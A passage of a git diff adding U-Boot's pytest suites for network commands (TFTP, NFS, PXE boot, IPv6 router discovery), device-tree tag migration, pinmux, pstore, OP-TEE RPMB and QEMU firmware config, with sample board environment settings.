+ """ + + if not net_set_up: + pytest.skip('Network not initialized') + + output = ubman.run_command('ping $serverip') + assert 'is alive' in output + +@pytest.mark.buildconfigspec('IPV6_ROUTER_DISCOVERY') +def test_net_network_discovery(ubman): + """Test the network discovery feature of IPv6. + + An IPv6 network command (ping6 in this case) is run to make U-Boot send a + router solicitation packet, receive a router advertisement message, and + parse it. + A router advertisement service needs to be running for this test to succeed. + U-Boot receives the RA, processes it, and if successful, assigns the gateway + IP and prefix length. + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + router_on_net = ubman.config.env.get('env__router_on_net', False) + if not router_on_net: + pytest.skip('No router on network') + + fake_host_ip = 'fe80::215:5dff:fef6:2ec6' + output = ubman.run_command('ping6 ' + fake_host_ip) + assert 'ROUTER SOLICITATION 1' in output + assert 'Set gatewayip6:' in output + assert '0000:0000:0000:0000:0000:0000:0000:0000' not in output + +@pytest.mark.buildconfigspec('cmd_tftpboot') +def test_net_tftpboot(ubman): + """Test the tftpboot command. + + A file is downloaded from the TFTP server, its size and optionally its + CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip('Network not initialized') + + f = ubman.config.env.get('env__net_tftp_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + addr = f.get('addr', None) + + fn = f['fn'] + if not addr: + output = ubman.run_command('tftpboot %s' % (fn)) + else: + output = ubman.run_command('tftpboot %x %s' % (addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return + + if ubman.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return + + output = ubman.run_command('crc32 $fileaddr $filesize') + assert expected_crc in output + +@pytest.mark.buildconfigspec('cmd_nfs') +def test_net_nfs(ubman): + """Test the nfs command. + + A file is downloaded from the NFS server, its size and optionally its + CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip('Network not initialized') + + f = ubman.config.env.get('env__net_nfs_readable_file', None) + if not f: + pytest.skip('No NFS readable file to read') + + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + fn = f['fn'] + output = ubman.run_command('nfs %x %s' % (addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return + + if ubman.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return + + output = ubman.run_command('crc32 %x $filesize' % addr) + assert expected_crc in output + +@pytest.mark.buildconfigspec("cmd_pxe") +def test_net_pxe_get(ubman): + """Test the pxe get command. + + A pxe configuration file is downloaded from the TFTP server and interpreted + to boot the images mentioned in pxe configuration file. 
+ + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip("Network not initialized") + + test_net_setup_static(ubman) + + f = ubman.config.env.get("env__net_pxe_readable_file", None) + if not f: + pytest.skip("No PXE readable file to read") + + addr = f.get("addr", None) + timeout = f.get("timeout", ubman.p.timeout) + + pxeuuid = uuid.uuid1() + ubman.run_command(f"setenv pxeuuid {pxeuuid}") + expected_text_uuid = f"Retrieving file: pxelinux.cfg/{pxeuuid}" + + ethaddr = ubman.run_command("echo $ethaddr") + ethaddr = ethaddr.replace(':', '-') + expected_text_ethaddr = f"Retrieving file: pxelinux.cfg/01-{ethaddr}" + + ip = ubman.run_command("echo $ipaddr") + ip = ip.split('.') + ipaddr_file = "".join(['%02x' % int(x) for x in ip]).upper() + expected_text_ipaddr = f"Retrieving file: pxelinux.cfg/{ipaddr_file}" + expected_text_default = f"Retrieving file: pxelinux.cfg/default" + + with ubman.temporary_timeout(timeout): + output = ubman.run_command("pxe get") + + assert "TIMEOUT" not in output + assert expected_text_uuid in output + assert expected_text_ethaddr in output + assert expected_text_ipaddr in output + + i = 1 + for i in range(0, len(ipaddr_file) - 1): + expected_text_ip = f"Retrieving file: pxelinux.cfg/{ipaddr_file[:-i]}" + assert expected_text_ip in output + i += 1 + + assert expected_text_default in output + assert "Config file 'default.boot' found" in output + +@pytest.mark.buildconfigspec("cmd_crc32") +@pytest.mark.buildconfigspec("cmd_tftpboot") +@pytest.mark.buildconfigspec("cmd_tftpput") +def test_net_tftpput(ubman): + """Test the tftpput command. + + A file is downloaded from the TFTP server and then uploaded to the TFTP + server, its size and its CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. 
+ """ + + if not net_set_up: + pytest.skip("Network not initialized") + + f = ubman.config.env.get("env__net_tftp_readable_file", None) + if not f: + pytest.skip("No TFTP readable file to read") + + addr = f.get("addr", None) + if not addr: + addr = utils.find_ram_base(ubman) + + sz = f.get("size", None) + timeout = f.get("timeout", ubman.p.timeout) + fn = f["fn"] + fnu = f.get("fnu", "_".join([datetime.datetime.now().strftime("%y%m%d%H%M%S"), fn])) + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + + with ubman.temporary_timeout(timeout): + output = ubman.run_command("tftpboot %x %s" % (addr, fn)) + + assert "TIMEOUT" not in output + assert expected_text in output + + expected_tftpb_crc = f.get("crc32", None) + + output = ubman.run_command("crc32 $fileaddr $filesize") + assert expected_tftpb_crc in output + + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + "tftpput $fileaddr $filesize $serverip:%s" % (fnu) + ) + + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + addr = addr + sz + assert "TIMEOUT" not in output + assert "Access violation" not in output + assert expected_text in output + + with ubman.temporary_timeout(timeout): + output = ubman.run_command("tftpboot %x %s" % (addr, fnu)) + + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + assert "TIMEOUT" not in output + assert expected_text in output + + output = ubman.run_command("crc32 $fileaddr $filesize") + assert expected_tftpb_crc in output diff --git a/test/py/tests/test_net_boot.py b/test/py/tests/test_net_boot.py new file mode 100644 index 00000000000..abf6dfbaf5e --- /dev/null +++ b/test/py/tests/test_net_boot.py @@ -0,0 +1,400 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import utils +import test_net +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +which the network environment available for testing. Without this, this test +will be automatically skipped. + +For example: + +# Details regarding a boot image file that may be read from a TFTP server. This +# variable may be omitted or set to None if TFTP boot testing is not possible +# or desired. +env__net_tftp_bootable_file = { + 'fn': 'image.ub', + 'addr': 0x10000000, + 'size': 5058624, + 'crc32': 'c2244b26', + 'pattern': 'Linux', + 'config': 'config@2', + 'timeout': 50000, + 'check_type': 'boot_error', + 'check_pattern': 'ERROR', +} + +# False or omitted if a TFTP boot test should be tested. +# If TFTP boot testing is not possible or desired, set this variable to True. +# For example: If FIT image is not proper to boot +env__tftp_boot_test_skip = False + +# Here is the example of FIT image configurations: +configurations { + default = "config@1"; + config@1 { + description = "Boot Linux kernel with config@1"; + kernel = "kernel@0"; + fdt = "fdt@0"; + ramdisk = "ramdisk@0"; + hash@1 { + algo = "sha1"; + }; + }; + config@2 { + description = "Boot Linux kernel with config@2"; + kernel = "kernel@1"; + fdt = "fdt@1"; + ramdisk = "ramdisk@1"; + hash@1 { + algo = "sha1"; + }; + }; +}; + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if PXE testing is not possible or desired. 
+env__net_pxe_bootable_file = { + 'fn': 'default', + 'addr': 0x10000000, + 'size': 74, + 'timeout': 50000, + 'pattern': 'Linux', + 'valid_label': '1', + 'invalid_label': '2', + 'exp_str_invalid': 'Skipping install for failure retrieving', + 'local_label': '3', + 'exp_str_local': 'missing environment variable: localcmd', + 'empty_label': '4', + 'exp_str_empty': 'No kernel given, skipping boot', + 'check_type': 'boot_error', + 'check_pattern': 'ERROR', +} + +# False if a PXE boot test should be tested. +# If PXE boot testing is not possible or desired, set this variable to True. +# For example: If pxe configuration file is not proper to boot +env__pxe_boot_test_skip = False + +# Here is the example of pxe configuration file ordered based on the execution +# flow: +1) /tftpboot/pxelinux.cfg/default-arm-zynqmp + + menu include pxelinux.cfg/default-arm + timeout 50 + + default Linux + +2) /tftpboot/pxelinux.cfg/default-arm + + menu title Linux boot selections + menu include pxelinux.cfg/default + + label install + menu label Invalid boot + kernel kernels/install.bin + append console=ttyAMA0,38400 debug earlyprintk + initrd initrds/uzInitrdDebInstall + + label local + menu label Local boot + append root=/dev/sdb1 + localboot 1 + + label boot + menu label Empty boot + +3) /tftpboot/pxelinux.cfg/default + + label Linux + menu label Boot kernel + kernel Image + fdt system.dtb + initrd rootfs.cpio.gz.u-boot +""" + +def setup_networking(ubman): + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + +def setup_tftpboot_boot(ubman): + f = ubman.config.env.get('env__net_tftp_bootable_file', None) + if not f: + pytest.skip('No TFTP bootable file to read') + + setup_networking(ubman) + addr = f.get('addr', None) + if not addr: + addr = utils.find_ram_base(ubman) + + fn = f['fn'] + timeout = f.get('timeout', 50000) + + with ubman.temporary_timeout(timeout): + output = ubman.run_command('tftpboot %x %s' % (addr, fn)) + + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + output = ubman.run_command('crc32 %x $filesize' % addr) + if expected_crc: + assert expected_crc in output + + pattern = f.get('pattern') + chk_type = f.get('check_type', 'boot_error') + chk_pattern = re.compile(f.get('check_pattern', 'ERROR')) + config = f.get('config', None) + + return addr, timeout, pattern, chk_type, chk_pattern, config + +@pytest.mark.buildconfigspec('cmd_tftpboot') +def test_net_tftpboot_boot(ubman): + """Boot the loaded image + + A boot file (fit image) is downloaded from the TFTP server and booted using + bootm command with the default fit configuration, its boot log pattern are + validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. 
+ """ + if ubman.config.env.get('env__tftp_boot_test_skip', True): + pytest.skip('TFTP boot test is not enabled!') + + addr, timeout, pattern, chk_type, chk_pattern, imcfg = setup_tftpboot_boot( + ubman + ) + + if imcfg: + bootcmd = 'bootm %x#%s' % (addr, imcfg) + else: + bootcmd = 'bootm %x' % addr + + with ubman.enable_check( + chk_type, chk_pattern + ), ubman.temporary_timeout(timeout): + try: + # wait_for_prompt=False makes the core code not wait for the U-Boot + # prompt code to be seen, since it won't be on a successful kernel + # boot + ubman.run_command(bootcmd, wait_for_prompt=False) + + # Wait for boot log pattern + ubman.wait_for(pattern) + finally: + # This forces the console object to be shutdown, so any subsequent + # test will reset the board back into U-Boot. We want to force this + # no matter whether the kernel boot passed or failed. + ubman.drain_console() + ubman.cleanup_spawn() + +def setup_pxe_boot(ubman): + f = ubman.config.env.get('env__net_pxe_bootable_file', None) + if not f: + pytest.skip('No PXE bootable file to read') + + setup_networking(ubman) + bootfile = ubman.run_command('echo $bootfile') + if not bootfile: + bootfile = '<NULL>' + + return f, bootfile + +@pytest.mark.buildconfigspec('cmd_pxe') +def test_net_pxe_boot(ubman): + """Test the pxe boot command. + + A pxe configuration file is downloaded from the TFTP server and interpreted + to boot the images mentioned in pxe configuration file. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + if ubman.config.env.get('env__pxe_boot_test_skip', True): + pytest.skip('PXE boot test is not enabled!') + + f, bootfile = setup_pxe_boot(ubman) + addr = f.get('addr', None) + timeout = f.get('timeout', ubman.p.timeout) + fn = f['fn'] + + if addr: + ubman.run_command('setenv pxefile_addr_r %x' % addr) + + with ubman.temporary_timeout(timeout): + output = ubman.run_command('pxe get') + + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert 'TIMEOUT' not in output + assert expected_text in output + assert f"Config file '{bootfile}' found" in output + + pattern = f.get('pattern') + chk_type = f.get('check_type', 'boot_error') + chk_pattern = re.compile(f.get('check_pattern', 'ERROR')) + + if not addr: + pxe_boot_cmd = 'pxe boot' + else: + pxe_boot_cmd = 'pxe boot %x' % addr + + with ubman.enable_check( + chk_type, chk_pattern + ), ubman.temporary_timeout(timeout): + try: + ubman.run_command(pxe_boot_cmd, wait_for_prompt=False) + ubman.wait_for(pattern) + finally: + ubman.drain_console() + ubman.cleanup_spawn() + +@pytest.mark.buildconfigspec('cmd_pxe') +def test_net_pxe_boot_config(ubman): + """Test the pxe boot command by selecting different combination of labels + + A pxe configuration file is downloaded from the TFTP server and interpreted + to boot the images mentioned in pxe configuration file. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. 
+ """ + if ubman.config.env.get('env__pxe_boot_test_skip', True): + pytest.skip('PXE boot test is not enabled!') + + f, bootfile = setup_pxe_boot(ubman) + addr = f.get('addr', None) + timeout = f.get('timeout', ubman.p.timeout) + fn = f['fn'] + local_label = f['local_label'] + empty_label = f['empty_label'] + exp_str_local = f['exp_str_local'] + exp_str_empty = f['exp_str_empty'] + + if addr: + ubman.run_command('setenv pxefile_addr_r %x' % addr) + + with ubman.temporary_timeout(timeout): + output = ubman.run_command('pxe get') + + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert 'TIMEOUT' not in output + assert expected_text in output + assert f"Config file '{bootfile}' found" in output + + pattern = f.get('pattern') + chk_type = f.get('check_type', 'boot_error') + chk_pattern = re.compile(f.get('check_pattern', 'ERROR')) + + if not addr: + pxe_boot_cmd = 'pxe boot' + else: + pxe_boot_cmd = 'pxe boot %x' % addr + + with ubman.enable_check( + chk_type, chk_pattern + ), ubman.temporary_timeout(timeout): + try: + ubman.run_command(pxe_boot_cmd, wait_for_prompt=False) + + # pxe config is loaded where multiple labels are there and need to + # select particular label to boot and check for expected string + # In this case, local label is selected and it should look for + # localcmd env variable and if that variable is not defined it + # should not boot it and come out to u-boot prompt + ubman.wait_for('Enter choice:') + ubman.run_command(local_label, wait_for_prompt=False) + expected_str = ubman.p.expect([exp_str_local]) + assert ( + expected_str == 0 + ), f'Expected string: {exp_str_local} did not match!' + + # In this case, empty label is selected and it should look for + # kernel image path and if it is not set it should fail it and load + # default label to boot + ubman.run_command(pxe_boot_cmd, wait_for_prompt=False) + ubman.wait_for('Enter choice:') + ubman.run_command(empty_label, wait_for_prompt=False) + expected_str = ubman.p.expect([exp_str_empty]) + assert ( + expected_str == 0 + ), f'Expected string: {exp_str_empty} did not match!' + + ubman.wait_for(pattern) + finally: + ubman.drain_console() + ubman.cleanup_spawn() + +@pytest.mark.buildconfigspec('cmd_pxe') +def test_net_pxe_boot_config_invalid(ubman): + """Test the pxe boot command by selecting invalid label + + A pxe configuration file is downloaded from the TFTP server and interpreted + to boot the images mentioned in pxe configuration file. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. 
+ """ + if ubman.config.env.get('env__pxe_boot_test_skip', True): + pytest.skip('PXE boot test is not enabled!') + + f, bootfile = setup_pxe_boot(ubman) + addr = f.get('addr', None) + timeout = f.get('timeout', ubman.p.timeout) + fn = f['fn'] + invalid_label = f['invalid_label'] + exp_str_invalid = f['exp_str_invalid'] + + if addr: + ubman.run_command('setenv pxefile_addr_r %x' % addr) + + with ubman.temporary_timeout(timeout): + output = ubman.run_command('pxe get') + + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert 'TIMEOUT' not in output + assert expected_text in output + assert f"Config file '{bootfile}' found" in output + + pattern = f.get('pattern') + if not addr: + pxe_boot_cmd = 'pxe boot' + else: + pxe_boot_cmd = 'pxe boot %x' % addr + + with ubman.temporary_timeout(timeout): + try: + ubman.run_command(pxe_boot_cmd, wait_for_prompt=False) + + # pxe config is loaded where multiple labels are there and need to + # select particular label to boot and check for expected string + # In this case invalid label is selected, it should load invalid + # label and if it fails it should load the default label to boot + ubman.wait_for('Enter choice:') + ubman.run_command(invalid_label, wait_for_prompt=False) + expected_str = ubman.p.expect([exp_str_invalid]) + assert ( + expected_str == 0 + ), f'Expected string: {exp_str_invalid} did not match!' + + ubman.wait_for(pattern) + finally: + ubman.drain_console() + ubman.cleanup_spawn() diff --git a/test/py/tests/test_of_migrate.py b/test/py/tests/test_of_migrate.py new file mode 100644 index 00000000000..ab89332331e --- /dev/null +++ b/test/py/tests/test_of_migrate.py @@ -0,0 +1,105 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2023 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +"""Test handling of unmigrated u-boot,dm- tags""" + +import os +import pytest + +import utils + +# This is needed for Azure, since the default '..' 
directory is not writeable +TMPDIR1 = '/tmp/test_no_migrate' +TMPDIR2 = '/tmp/test_no_migrate_spl' +TMPDIR3 = '/tmp/test_migrate' + +def build_for_migrate(ubman, replace_pair, board, tmpdir, disable_migrate=True): + """Build an updated U-Boot with a slightly modified device tree + + Args: + ubman (ConsoleBase): U-Boot console + replace_pair (tuple): + String to find + String to replace it with + board (str): Board to build + tmpdir (str): Temporary directory to use + disable_migrate (bool): True to disable CONFIG_OF_TAG_MIGRATE in build + """ + srcdir = ubman.config.source_dir + build_dir = ubman.config.build_dir + + # Get the source for the existing dts + dt_dir = os.path.join(build_dir, 'arch', 'sandbox', 'dts') + orig_fname = os.path.join(dt_dir, 'sandbox.dtb') + out_dts = os.path.join(dt_dir, 'sandbox_out.dts') + utils.run_and_log(ubman, ['dtc', orig_fname, '-I', 'dtb', '-O', 'dts', + '-o', out_dts]) + + # Update it to use an old tag + with open(out_dts) as inf: + data = inf.read() + data = data.replace(*replace_pair) + + dts_fname = os.path.join(dt_dir, 'sandbox_oldtag.dts') + with open(dts_fname, 'w') as outf: + print(data, file=outf) + dtb_fname = os.path.join(dt_dir, 'sandbox_oldtag.dtb') + utils.run_and_log(ubman, ['dtc', dts_fname, '-o', dtb_fname]) + + migrate = ['-a', '~CONFIG_OF_TAG_MIGRATE'] if disable_migrate else [] + + # Build sandbox with this new dtb, turning off OF_TAG_MIGRATE + env = dict(os.environ) + env['EXT_DTB'] = dtb_fname + env['DEVICE_TREE'] = 'sandbox_new' + env['NO_LTO'] = '1' # Speed up build + out = utils.run_and_log( + ubman, ['./tools/buildman/buildman', '-m', '--board', board, + *migrate, '-w', '-o', tmpdir], ignore_errors=True, env=env) + return out + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_of_no_migrate(ubman): + """Test sandbox with old boot phase tags like u-boot,dm-pre-proper""" + + build_for_migrate(ubman, ['bootph-some-ram', 'u-boot,dm-pre-proper'], + 'sandbox', TMPDIR1) + + # It should fail to run, since the lcd device will not be bound before + # relocation. 
so won't get its frame-buffer memory + out = utils.run_and_log( + ubman, [os.path.join(TMPDIR1, 'u-boot'), '-D', '-c', 'help'], + ignore_errors=True) + assert "Video device 'lcd' cannot allocate frame buffer memory" in out + + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.boardspec('spl_of_platdata_inst') +@pytest.mark.boardspec('!sandbox_tpl') +def test_of_no_migrate_spl(ubman): + """Test sandbox with old boot phase tags like u-boot,dm-spl""" + + out = build_for_migrate(ubman, ['bootph-pre-ram', 'u-boot,dm-spl'], + 'sandbox_spl', TMPDIR2) + + # It should fail to build, since the SPL DT will not include 'spl-test' + # node, among others + assert "undefined type ‘struct dtd_sandbox_spl_test’" in out + + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_of_migrate(ubman): + """Test sandbox shows a message when tags were migrated""" + + build_for_migrate(ubman, ['bootph-some-ram', 'u-boot,dm-pre-proper'], + 'sandbox', TMPDIR3, disable_migrate=False) + + # It should show a migration message + out = utils.run_and_log( + ubman, [os.path.join(TMPDIR3, 'u-boot'), '-D', '-c', 'help'], + ignore_errors=True) + assert "Warning: Device tree includes old 'u-boot,dm-' tags" in out diff --git a/test/py/tests/test_ofplatdata.py b/test/py/tests/test_ofplatdata.py new file mode 100644 index 00000000000..d31fa55f7c7 --- /dev/null +++ b/test/py/tests/test_ofplatdata.py @@ -0,0 +1,22 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016 Google, Inc + +import pytest +import utils + +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.buildconfigspec('spl_of_platdata') +def test_spl_devicetree(ubman): + """Test content of spl device-tree""" + dtb = ubman.config.build_dir + '/spl/u-boot-spl.dtb' + fdtgrep = ubman.config.build_dir + '/tools/fdtgrep' + output = utils.run_and_log(ubman, [fdtgrep, '-l', dtb]) + + assert "bootph-all" not in output + assert "bootph-some-ram" not in output + assert "bootph-pre-ram" not in output + assert "bootph-pre-sram" not in output + + assert "spl-test5" not in output + assert "spl-test6" not in output + assert "spl-test7" in output diff --git a/test/py/tests/test_optee_rpmb.py b/test/py/tests/test_optee_rpmb.py new file mode 100644 index 00000000000..04b3b5e41ef --- /dev/null +++ b/test/py/tests/test_optee_rpmb.py @@ -0,0 +1,20 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Tests for OP-TEE RPMB read/write support + +""" +This tests optee_rpmb cmd in U-Boot +""" + +import pytest +import utils + +@pytest.mark.buildconfigspec('cmd_optee_rpmb') +def test_optee_rpmb_read_write(ubman): + """Test OP-TEE RPMB cmd read/write + """ + response = ubman.run_command('optee_rpmb write_pvalue test_variable test_value') + assert response == 'Wrote 11 bytes' + + response = ubman.run_command('optee_rpmb read_pvalue test_variable 11') + assert response == 'Read 11 bytes, value = test_value' diff --git a/test/py/tests/test_part.py b/test/py/tests/test_part.py new file mode 100644 index 00000000000..04c95a6d3cc --- /dev/null +++ b/test/py/tests/test_part.py @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 +# Niel Fourie, DENX Software Engineering, lusus@denx.de + +import pytest + +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.buildconfigspec('partitions') +@pytest.mark.buildconfigspec('efi_partition') +def test_part_types(ubman): + """Test that `part types` prints a result which includes `EFI`.""" + output = ubman.run_command('part types') + assert "Supported partition tables:" in output + assert "EFI" in output diff --git 
a/test/py/tests/test_pinmux.py b/test/py/tests/test_pinmux.py new file mode 100644 index 00000000000..ee79e843341 --- /dev/null +++ b/test/py/tests/test_pinmux.py @@ -0,0 +1,85 @@ +# SPDX-License-Identifier: GPL-2.0 + +import pytest +import utils + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_usage_1(ubman): + """Test that 'pinmux' command without parameters displays + pinmux usage.""" + output = ubman.run_command('pinmux') + assert 'Usage:' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_usage_2(ubman): + """Test that 'pinmux status' executed without previous "pinmux dev" + command displays error message.""" + output = ubman.run_command('pinmux status') + assert 'pin-controller device not selected' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_status_all(ubman): + """Test that 'pinmux status -a' displays pin's muxing.""" + output = ubman.run_command('pinmux status -a') + + assert ('pinctrl-gpio:' in output) + assert ('a5 : gpio output .' in output) + assert ('a6 : gpio output .' in output) + + assert ('pinctrl:' in output) + assert ('P0 : UART TX.' in output) + assert ('P1 : UART RX.' in output) + assert ('P2 : I2S SCK.' in output) + assert ('P3 : I2S SD.' in output) + assert ('P4 : I2S WS.' in output) + assert ('P5 : GPIO0 bias-pull-up input-disable.' in output) + assert ('P6 : GPIO1 drive-open-drain.' in output) + assert ('P7 : GPIO2 bias-pull-down input-enable.' in output) + assert ('P8 : GPIO3 bias-disable.' in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_list(ubman): + """Test that 'pinmux list' returns the pin-controller list.""" + output = ubman.run_command('pinmux list') + assert 'sandbox_pinctrl' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_dev_bad(ubman): + """Test that 'pinmux dev' returns an error when trying to select a + wrong pin controller.""" + pincontroller = 'bad_pin_controller_name' + output = ubman.run_command('pinmux dev ' + pincontroller) + expected_output = 'Can\'t get the pin-controller: ' + pincontroller + '!' + assert (expected_output in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_dev(ubman): + """Test that 'pinmux dev' select the wanted pin controller.""" + pincontroller = 'pinctrl' + output = ubman.run_command('pinmux dev ' + pincontroller) + expected_output = 'dev: ' + pincontroller + assert (expected_output in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_status(ubman): + """Test that 'pinmux status' displays selected pincontroller's pin + muxing descriptions.""" + ubman.run_command('pinmux dev pinctrl') + output = ubman.run_command('pinmux status') + + assert (not 'pinctrl-gpio:' in output) + assert (not 'pinctrl:' in output) + + assert ('P0 : UART TX.' in output) + assert ('P1 : UART RX.' in output) + assert ('P2 : I2S SCK.' in output) + assert ('P3 : I2S SD.' in output) + assert ('P4 : I2S WS.' in output) + assert ('P5 : GPIO0 bias-pull-up input-disable.' in output) + assert ('P6 : GPIO1 drive-open-drain.' in output) + assert ('P7 : GPIO2 bias-pull-down input-enable.' in output) + assert ('P8 : GPIO3 bias-disable.' 
in output) diff --git a/test/py/tests/test_pstore.py b/test/py/tests/test_pstore.py new file mode 100644 index 00000000000..70e07503ad3 --- /dev/null +++ b/test/py/tests/test_pstore.py @@ -0,0 +1,77 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Collabora +# Author: Frédéric Danis <frederic.danis@collabora.com> + +import pytest +import utils +import os +import tempfile +import shutil + +PSTORE_ADDR=0x3000000 +PSTORE_LENGTH=0x100000 +PSTORE_PANIC1='test/py/tests/test_pstore_data_panic1.hex' +PSTORE_PANIC2='test/py/tests/test_pstore_data_panic2.hex' +PSTORE_CONSOLE='test/py/tests/test_pstore_data_console.hex' +ADDR=0x01000008 + +def load_pstore(ubman): + """Load PStore records from sample files""" + + output = ubman.run_command_list([ + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR, + os.path.join(ubman.config.source_dir, PSTORE_PANIC1)), + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR + 4096, + os.path.join(ubman.config.source_dir, PSTORE_PANIC2)), + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR + 253 * 4096, + os.path.join(ubman.config.source_dir, PSTORE_CONSOLE)), + 'pstore set 0x%x 0x%x' % (PSTORE_ADDR, PSTORE_LENGTH)]) + +def checkfile(ubman, path, filesize, checksum): + """Check file against MD5 checksum""" + + output = ubman.run_command_list([ + 'load hostfs - %x %s' % (ADDR, path), + 'printenv filesize']) + assert('filesize=%x' % (filesize) in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(checksum in ''.join(output)) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_display_all_records(ubman): + """Test that pstore displays all records.""" + + ubman.run_command('') + load_pstore(ubman) + response = ubman.run_command('pstore display') + assert('**** Dump' in response) + assert('**** Console' in response) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_display_one_record(ubman): + """Test that pstore displays only one record.""" + + ubman.run_command('') + load_pstore(ubman) + response = ubman.run_command('pstore display dump 1') + assert('Panic#2 Part1' in response) + assert('**** Console' not in response) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_save_records(ubman): + """Test that pstore saves all records.""" + + outdir = tempfile.mkdtemp() + + ubman.run_command('') + load_pstore(ubman) + ubman.run_command('pstore save hostfs - %s' % (outdir)) + + checkfile(ubman, '%s/dmesg-ramoops-0' % (outdir), 3798, '8059335ab4cfa62c77324c491659c503') + checkfile(ubman, '%s/dmesg-ramoops-1' % (outdir), 4035, '3ff30df3429d81939c75d0070b5187b9') + checkfile(ubman, '%s/console-ramoops-0' % (outdir), 4084, 'bb44de4a9b8ebd9b17ae98003287325b') + + shutil.rmtree(outdir) diff --git a/test/py/tests/test_pstore_data_console.hex b/test/py/tests/test_pstore_data_console.hex Binary files differnew file mode 100644 index 00000000000..e7f426e8928 --- /dev/null +++ b/test/py/tests/test_pstore_data_console.hex diff --git a/test/py/tests/test_pstore_data_panic1.hex b/test/py/tests/test_pstore_data_panic1.hex Binary files differnew file mode 100644 index 00000000000..988929d12c2 --- /dev/null +++ b/test/py/tests/test_pstore_data_panic1.hex diff --git a/test/py/tests/test_pstore_data_panic2.hex b/test/py/tests/test_pstore_data_panic2.hex Binary files differnew file mode 100644 index 00000000000..8f9d56cbe01 --- /dev/null +++ b/test/py/tests/test_pstore_data_panic2.hex diff --git a/test/py/tests/test_qfw.py b/test/py/tests/test_qfw.py new file mode 100644 index 00000000000..844cd3d9367 
--- /dev/null +++ b/test/py/tests/test_qfw.py @@ -0,0 +1,26 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2021, Asherah Connor <ashe@kivikakk.ee> + +# Test qfw command implementation + +import pytest + +@pytest.mark.buildconfigspec('cmd_qfw') +def test_qfw_cpus(ubman): + "Test QEMU firmware config reports the CPU count." + + output = ubman.run_command('qfw cpus') + # The actual number varies depending on the board under test, so only + # assert a non-zero output. + assert 'cpu(s) online' in output + assert '0 cpu(s) online' not in output + +@pytest.mark.buildconfigspec('cmd_qfw') +def test_qfw_list(ubman): + "Test QEMU firmware config lists devices." + + output = ubman.run_command('qfw list') + # Assert either: + # 1) 'test-one', from the sandbox driver, or + # 2) 'bootorder', found in every real QEMU implementation. + assert ("bootorder" in output) or ("test-one" in output) diff --git a/test/py/tests/test_reset.py b/test/py/tests/test_reset.py new file mode 100644 index 00000000000..af079a70664 --- /dev/null +++ b/test/py/tests/test_reset.py @@ -0,0 +1,63 @@ +# 